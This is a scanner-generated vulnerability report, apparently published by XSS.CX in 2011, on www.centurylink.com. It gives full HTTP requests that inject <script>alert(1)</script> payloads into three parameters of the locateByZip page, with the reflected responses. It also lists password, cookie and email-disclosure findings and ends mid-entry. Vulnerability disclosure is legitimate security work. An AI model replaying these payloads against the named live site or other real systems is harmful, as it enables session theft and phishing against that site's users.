XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, www.centurylink.com

Report generated by XSS.CX at Tue Sep 06 09:05:02 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://www.centurylink.com/locate/locateByZip.html [callback parameter]

1.2. http://www.centurylink.com/locate/locateByZip.html [rememberMe parameter]

1.3. http://www.centurylink.com/locate/locateByZip.html [requestorId parameter]

2. Cleartext submission of password

2.1. http://www.centurylink.com/

2.2. http://www.centurylink.com/

2.3. http://www.centurylink.com/

3. Password field with autocomplete enabled

3.1. http://www.centurylink.com/

3.2. http://www.centurylink.com/

3.3. http://www.centurylink.com/

4. Cookie scoped to parent domain

5. Cookie without HttpOnly flag set

6. Email addresses disclosed

6.1. http://www.centurylink.com/assets/css/banners.css

6.2. http://www.centurylink.com/assets/css/plugins/jqModal.css

6.3. http://www.centurylink.com/assets/js/plugins/jqModal.js

7. HTML does not specify charset

8. Content type incorrectly stated

8.1. http://www.centurylink.com/assets/images/banners/165x238_bmg_dd.png

8.2. http://www.centurylink.com/assets/js/third-party/metrics/metrixConfig.js



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.centurylink.com/locate/locateByZip.html [callback parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /locate/locateByZip.html

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b1283<script>alert(1)</script>fcb2bc490c1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locate/locateByZip.html?callback=jQuery15209837446943856776_1315319710928b1283<script>alert(1)</script>fcb2bc490c1&requestorId=EBIZ&rememberMe=Y&zipCode=10010&_=1315319751861 HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2732F3BD850119BF-60000108A0282E61[CE]; mbox=session#1315319236191-142486#1315321571|PC#1315319236191-142486.19#1316529311|check#true#1315319771; s_cc=true; gpv_ptemp=ctl%7Crsd%7Czam; s_nr=1315319747027-New; eVar61=ctl%7Crsd%7Czam; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:36:47 GMT
Set-Cookie: remember_me=; Domain=centurylink.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: profile_cookie=%73%68%6F%70%70%69%6E%67%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%73%75%70%70%6F%72%74%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%64%6F%6D%61%69%6E%4F%76%65%72%6C%61%70%7C%4E; Domain=centurylink.com; Path=/
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Expires: Mon, 1 Jan 2006 05:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 1006

jQuery15209837446943856776_1315319710928b1283<script>alert(1)</script>fcb2bc490c1({"accountType":"UNKNOWN","addressErrors":"zipCode","addressRequestValid":false,"callback":"jQuery15209837446943856776_1315319710928b1283<script>
...[SNIP]...

1.2. http://www.centurylink.com/locate/locateByZip.html [rememberMe parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /locate/locateByZip.html

Issue detail

The value of the rememberMe request parameter is copied into the HTML document as plain text between tags. The payload 2cef8<script>alert(1)</script>ac7e4ec6391 was submitted in the rememberMe parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locate/locateByZip.html?callback=jQuery15209837446943856776_1315319710928&requestorId=EBIZ&rememberMe=Y2cef8<script>alert(1)</script>ac7e4ec6391&zipCode=10010&_=1315319751861 HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2732F3BD850119BF-60000108A0282E61[CE]; mbox=session#1315319236191-142486#1315321571|PC#1315319236191-142486.19#1316529311|check#true#1315319771; s_cc=true; gpv_ptemp=ctl%7Crsd%7Czam; s_nr=1315319747027-New; eVar61=ctl%7Crsd%7Czam; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:36:52 GMT
Set-Cookie: remember_me=; Domain=centurylink.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: profile_cookie=%73%68%6F%70%70%69%6E%67%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%73%75%70%70%6F%72%74%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%64%6F%6D%61%69%6E%4F%76%65%72%6C%61%70%7C%4E; Domain=centurylink.com; Path=/
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Expires: Mon, 1 Jan 2006 05:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 965

jQuery15209837446943856776_1315319710928({"accountType":"UNKNOWN","addressErrors":"zipCode","addressRequestValid":false,"callback":"jQuery15209837446943856776_1315319710928","city":"","cityOk":false,"
...[SNIP]...
,"entryAsPhoneNumber":"","entryPresent":false,"entryToBig":false,"entryToSmall":true,"entryValue":"","errorCode":"","errorMessage":"","locateCriteria":"10010","phoneNumberRequest":false,"rememberMe":"Y2cef8<script>alert(1)</script>ac7e4ec6391","rememberMeNoRequest":true,"rememberMeYesRequest":false,"requestorId":"EBIZ","requestorPresent":true,"shoppingDomain":"OOR","specialFlags":[],"state":"","stateOk":false,"streetAddress1":"","streetAdd
...[SNIP]...

1.3. http://www.centurylink.com/locate/locateByZip.html [requestorId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /locate/locateByZip.html

Issue detail

The value of the requestorId request parameter is copied into the HTML document as plain text between tags. The payload e2011<script>alert(1)</script>6b25a159008 was submitted in the requestorId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locate/locateByZip.html?callback=jQuery15209837446943856776_1315319710928&requestorId=EBIZe2011<script>alert(1)</script>6b25a159008&rememberMe=Y&zipCode=10010&_=1315319751861 HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2732F3BD850119BF-60000108A0282E61[CE]; mbox=session#1315319236191-142486#1315321571|PC#1315319236191-142486.19#1316529311|check#true#1315319771; s_cc=true; gpv_ptemp=ctl%7Crsd%7Czam; s_nr=1315319747027-New; eVar61=ctl%7Crsd%7Czam; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:36:50 GMT
Set-Cookie: remember_me=; Domain=centurylink.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: profile_cookie=%73%68%6F%70%70%69%6E%67%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%73%75%70%70%6F%72%74%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%64%6F%6D%61%69%6E%4F%76%65%72%6C%61%70%7C%4E; Domain=centurylink.com; Path=/
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Expires: Mon, 1 Jan 2006 05:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 965

jQuery15209837446943856776_1315319710928({"accountType":"UNKNOWN","addressErrors":"zipCode","addressRequestValid":false,"callback":"jQuery15209837446943856776_1315319710928","city":"","cityOk":false,"
...[SNIP]...
l":true,"entryValue":"","errorCode":"","errorMessage":"","locateCriteria":"10010","phoneNumberRequest":false,"rememberMe":"Y","rememberMeNoRequest":false,"rememberMeYesRequest":true,"requestorId":"EBIZe2011<script>alert(1)</script>6b25a159008","requestorPresent":true,"shoppingDomain":"OOR","specialFlags":[],"state":"","stateOk":false,"streetAddress1":"","streetAddressOk":false,"supportDomain":"OOR","targetContext":"","unitNumber":"","unitT
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.centurylink.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:15 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 69165
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>CenturyLink | Local Provider of High Speed Internet, Phone, Mobile & TV Services</titl
...[SNIP]...
<div id="qwest_ma-container">
                               <form id="qwest-ma-modal-login" method="post">
                                   <label for="ctam_qwest-ec-myaccount-username">
...[SNIP]...
</label>
                                   <input type="password" name="password" id="ctam_qwest-ec-myaccount-password" /><br />
...[SNIP]...

2.2. http://www.centurylink.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:15 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 69165
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>CenturyLink | Local Provider of High Speed Internet, Phone, Mobile & TV Services</titl
...[SNIP]...
<div id="ctl_ma-container">
                               <form id="ctl_ctam-ec-ma-form" method="post">
                               <label for="ctam_ctl-ec-myaccount-username">
...[SNIP]...
</label>
                               <input type="password" name="PASSWORD" id="ctam_ctl-ec-myaccount-password" /><br />
...[SNIP]...

2.3. http://www.centurylink.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:15 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 69165
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>CenturyLink | Local Provider of High Speed Internet, Phone, Mobile & TV Services</titl
...[SNIP]...
</div>
               <form name="mam_ec_form" id="mam_ec_form" method="post">
                   <div id="mam_ec-zip">
...[SNIP]...
</label>
                           <input type="password" name="password" id="mam_qwest-ec-myaccount-password" />&nbsp;&nbsp;&nbsp;<a href="http://qwest.centurylink.com/MasterWebPortal/appmanager/home/Qwest?_nfpb=true&_pageLabel=ForgotPasswordPage ">
...[SNIP]...
</label>
                           <input type="password" name="PASSWORD" id="mam_ctl-ec-myaccount-password" /> <a href="https://eam.centurylink.com/eam/troubleLoginpwd.do ">
...[SNIP]...

3. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


3.1. http://www.centurylink.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:15 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 69165
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>CenturyLink | Local Provider of High Speed Internet, Phone, Mobile & TV Services</titl
...[SNIP]...
<div id="ctl_ma-container">
                               <form id="ctl_ctam-ec-ma-form" method="post">
                               <label for="ctam_ctl-ec-myaccount-username">
...[SNIP]...
</label>
                               <input type="password" name="PASSWORD" id="ctam_ctl-ec-myaccount-password" /><br />
...[SNIP]...

3.2. http://www.centurylink.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:15 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 69165
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>CenturyLink | Local Provider of High Speed Internet, Phone, Mobile & TV Services</titl
...[SNIP]...
</div>
               <form name="mam_ec_form" id="mam_ec_form" method="post">
                   <div id="mam_ec-zip">
...[SNIP]...
</label>
                           <input type="password" name="password" id="mam_qwest-ec-myaccount-password" />&nbsp;&nbsp;&nbsp;<a href="http://qwest.centurylink.com/MasterWebPortal/appmanager/home/Qwest?_nfpb=true&_pageLabel=ForgotPasswordPage ">
...[SNIP]...
</label>
                           <input type="password" name="PASSWORD" id="mam_ctl-ec-myaccount-password" /> <a href="https://eam.centurylink.com/eam/troubleLoginpwd.do ">
...[SNIP]...

3.3. http://www.centurylink.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:15 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:15 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 69165
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>CenturyLink | Local Provider of High Speed Internet, Phone, Mobile & TV Services</titl
...[SNIP]...
<div id="qwest_ma-container">
                               <form id="qwest-ma-modal-login" method="post">
                                   <label for="ctam_qwest-ec-myaccount-username">
...[SNIP]...
</label>
                                   <input type="password" name="password" id="ctam_qwest-ec-myaccount-password" /><br />
...[SNIP]...

4. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /locate/locateByZip.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /locate/locateByZip.html?callback=jQuery15209837446943856776_1315319710928&requestorId=EBIZ&rememberMe=Y&zipCode=10010&_=1315319751861 HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2732F3BD850119BF-60000108A0282E61[CE]; mbox=session#1315319236191-142486#1315321571|PC#1315319236191-142486.19#1316529311|check#true#1315319771; s_cc=true; gpv_ptemp=ctl%7Crsd%7Czam; s_nr=1315319747027-New; eVar61=ctl%7Crsd%7Czam; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:35:55 GMT
Set-Cookie: profile_cookie=%73%68%6F%70%70%69%6E%67%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%73%75%70%70%6F%72%74%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%64%6F%6D%61%69%6E%4F%76%65%72%6C%61%70%7C%4E; Domain=centurylink.com; Path=/
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Expires: Mon, 1 Jan 2006 05:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 924

jQuery15209837446943856776_1315319710928({"accountType":"UNKNOWN","addressErrors":"zipCode","addressRequestValid":false,"callback":"jQuery15209837446943856776_1315319710928","city":"","cityOk":false,"
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /locate/locateByZip.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /locate/locateByZip.html?callback=jQuery15209837446943856776_1315319710928&requestorId=EBIZ&rememberMe=Y&zipCode=10010&_=1315319751861 HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2732F3BD850119BF-60000108A0282E61[CE]; mbox=session#1315319236191-142486#1315321571|PC#1315319236191-142486.19#1316529311|check#true#1315319771; s_cc=true; gpv_ptemp=ctl%7Crsd%7Czam; s_nr=1315319747027-New; eVar61=ctl%7Crsd%7Czam; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:35:55 GMT
Set-Cookie: profile_cookie=%73%68%6F%70%70%69%6E%67%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%73%75%70%70%6F%72%74%44%6F%6D%61%69%6E%7C%4F%4F%52%7E%64%6F%6D%61%69%6E%4F%76%65%72%6C%61%70%7C%4E; Domain=centurylink.com; Path=/
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Expires: Mon, 1 Jan 2006 05:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 924

jQuery15209837446943856776_1315319710928({"accountType":"UNKNOWN","addressErrors":"zipCode","addressRequestValid":false,"callback":"jQuery15209837446943856776_1315319710928","city":"","cityOk":false,"
...[SNIP]...

6. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://www.centurylink.com/assets/css/banners.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /assets/css/banners.css

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/css/banners.css HTTP/1.1
Host: www.centurylink.com
Proxy-Connection: keep-alive
Referer: http://www.centurylink.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 09:27:19 GMT
Server: Apache
Last-Modified: Sat, 16 Jul 2011 01:53:08 GMT
ETag: "c3400-7b2-4a8260716c900"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 09:27:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 1970
Content-Type: text/css

/*
* jquery.mb.components
* Copyright (c) 2001-2010. Matteo Bicocchi (Pupunzi); Open lab srl, Firenze - Italy
* email: mbicocchi@open-lab.com
* site: http://pupunzi.com
*
* Licences: MIT, GPL
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*/

body{
   font-family:"Lucida Sans Unicode","Lucida
...[SNIP]...

6.2. http://www.centurylink.com/assets/css/plugins/jqModal.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centurylink.com
Path:   /assets/css/plugins/jqModal.css

Issue detail

